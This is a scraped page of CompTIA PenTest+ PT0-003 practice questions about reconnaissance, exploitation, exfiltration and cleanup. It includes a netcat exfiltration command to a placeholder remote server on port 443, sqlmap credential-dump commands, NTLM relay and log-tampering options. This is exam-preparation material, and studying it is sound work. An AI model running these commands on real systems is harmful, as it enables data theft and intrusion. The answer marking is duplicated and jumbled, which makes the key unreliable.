During an external penetration test, a tester receives the following output from a tool:test.comptia.orginfo.comptia.orgvpn.comptia.orgexam.comptia.orgWhich of the following commands did the tester most likely run to get these results?

amass enum -passive -d comptia.org

nmap -Pn -sV -vv -A comptia.org

Which of the following tasks would ensure the key outputs from a penetration test are not lost as part of the cleanup and restoration activities?

Reverting configuration changes

A penetration tester is testing a power plant's network and needs to avoid disruption to the grid. Which of the following methods is most appropriate to identify vulnerabilities in the network?

Configure a port mirror and review the network traffic.

Configure a network scanner engine and execute the scan.

Execute a testing framework to validate vulnerabilities on the devices.

Configure a port mirror and review the network traffic.

Run a network mapper tool to get an understanding of the devices.

A penetration tester finished a security scan and uncovered numerous vulnerabilities on several hosts. Based on the targets' EPSS and CVSS scores, which of the following targets is the most likely to get attacked?Host | CVSS | EPSSTarget 1 | 4 | 0.6Target 2 | 2 | 0.3Target 3 | 1 | 0.6Target 4 | 4.5 | 0.4

Target 1: CVSS Score = 4 and EPSS Score = 0.6

Target 2: CVSS Score = 2 and EPSS Score = 0.3

Target 3: CVSS Score = 1 and EPSS Score = 0.6

Target 4: CVSS Score = 4.5 and EPSS Score = 0.4

A penetration tester discovers evidence of an advanced persistent threat on the network that is being tested. Which of the following should the tester do next?

Document the finding and continue testing.

A penetration tester needs to complete cleanup activities from the testing lead. Which of the following should the tester do to validate that reverse shell payloads are no longer running?

Run scripts to terminate the implant on affected hosts.

Restore the firewall settings of the original affected hosts.

Exit from C2 listener active sessions.

As part of an engagement, a penetration tester wants to maintain access to a compromised system after rebooting. Which of the following techniques would be best for the tester to use?

Executing a process injection attack

Performing a credential-dumping attack

In a file stored in an unprotected source code repository, a penetration tester discovers the following line of code:<a target='_blank' href='mailto:admin@192.168.6.14'>sshpass -p donotchange ssh admin@192.168.6.14</a>Which of the following should the tester attempt to do next to take advantage of this information? (Select two).

Take a screen capture of the source code repository for documentation purposes.

Investigate to find whether other files containing embedded passwords are in the code repository.

Use Nmap to identify all the SSH systems active on the network.

Take a screen capture of the source code repository for documentation purposes.

Investigate to find whether other files containing embedded passwords are in the code repository.

Confirm whether the server 192.168.6.14 is up by sending ICMP probes.

Run a password-spraying attack with Hydra against all the SSH servers.

Use an external exploit through Metasploit to compromise host 192.168.6.14.

During a security assessment, a penetration tester gains access to an internal server and manipulates some data to hide its presence. Which of the following is the best way for the penetration tester to hide the activities performed?

Reduce the log retention settings.

A tester enumerated a firewall policy and now needs to stage and exfiltrate data captured from the engagement. Given the following firewall policy:Action | SRC| DEST| --Block | 192.168.10.0/24 : 1-65535 | 10.0.0.0/24 : 22 | TCPAllow | 0.0.0.0/0 : 1-65535 | 192.168.10.0/24:443 | TCPAllow | 192.168.10.0/24 : 1-65535 | 0.0.0.0/0:443 | TCPBlock | . | . | *Which of the following commands should the tester try next?

tar -zcvf /tmp/data.tar.gz /path/to/data && nc -w 3 <remote_server> 443 < /tmp/data.tar.gz

gzip /path/to/data && cp data.gz <remote_server> 443

gzip /path/to/data && nc -nvlk 443; cat data.gz ' nc -w 3 <remote_server> 22

tar -zcvf /tmp/data.tar.gz /path/to/data && scp /tmp/data.tar.gz <remote_server>

A penetration tester wants to use multiple TTPs to assess the reactions (alerted, blocked, and others) by the client's current security tools. The threat-modeling team indicates the TTPs in the list might affect their internal systems and servers. Which of the following actions would the tester most likely take?

Use a BAS tool to test multiple TTPs based on the input from the threat-modeling team.

Perform an internal vulnerability assessment with credentials to review the internal attack surface.

Use a generic vulnerability scanner to test the TTPs and review the results with the threat-modeling team.

Perform a full internal penetration test to review all the possible exploits that could affect the systems.

A tester completed a report for a new client. Prior to sharing the report with the client, which of the following should the tester request to complete a review?

The customer's designated contact

During an assessment, a penetration tester exploits an SQLi vulnerability. Which of the following commands would allow the penetration tester to enumerate password hashes?

sqlmap -u www.example.com/?id=1 --dump -D accounts -T users -C cred

sqlmap -u www.example.com/?id=1 --search -T user

sqlmap -u www.example.com/?id=1 --dump -D accounts -T users -C cred

sqlmap -u www.example.com/?id=1 --tables -D accounts

sqlmap -u www.example.com/?id=1 --schema --current-user --current-db

A penetration tester needs to collect information over the network for further steps in an internal assessment. Which of the following would most likely accomplish this goal?

ntlmrelayx.py -t 192.168.1.0/24 -1 1234

crackmapexec smb 192.168.1.0/24

A penetration tester wants to use the following Bash script to identify active servers on a network:1 network_addr='192.168.1'2 for h in {1..254}; do3 ping -c 1 -W 1 $network_addr.$h > /dev/null4 if [ $? -eq 0 ]; then5 echo 'Host $h is up'6 else7 echo 'Host $h is down'8 fi9 doneWhich of the following should the tester do to modify the script?

Change the condition on line 4.

Replace $h with ${h} on line 3.

A penetration tester needs to launch an Nmap scan to find the state of the port for both TCP and UDP services. Which of the following commands should the tester use?

nmap -sU -sT -p 1-65535 example.com

nmap -sU -sW -p 1-65535 example.com

nmap -sU -sY -p 1-65535 example.com

nmap -sU -sT -p 1-65535 example.com

nmap -sU -sN -p 1-65535 example.com

A penetration tester performs an assessment on the target company's Kubernetes cluster using kube-hunter. Which of the following types of vulnerabilities could be detected with the tool?

Weaknesses and misconfigurations in the Kubernetes cluster

Network configuration errors in Kubernetes services

Weaknesses and misconfigurations in the Kubernetes cluster

Application deployment issues in Kubernetes

Security vulnerabilities specific to Docker containers

CompTIA PT0-003 Practice Test 1 - Free Online Exam Questions 1-40

Question 1 / 40

During a security audit, a penetration tester wants to run a process to gather information about a target network's domain structure and associated IP addresses. Which of the following tools should the tester use?

Dnsenum

Nmap

Netcat

Wireshark

Comment (0)

CompTIA PT0-003 Practice Test 1

Question

Drag and Drop

Hot Area

CompTIA PT0-003 Practice Tests

Practice Tests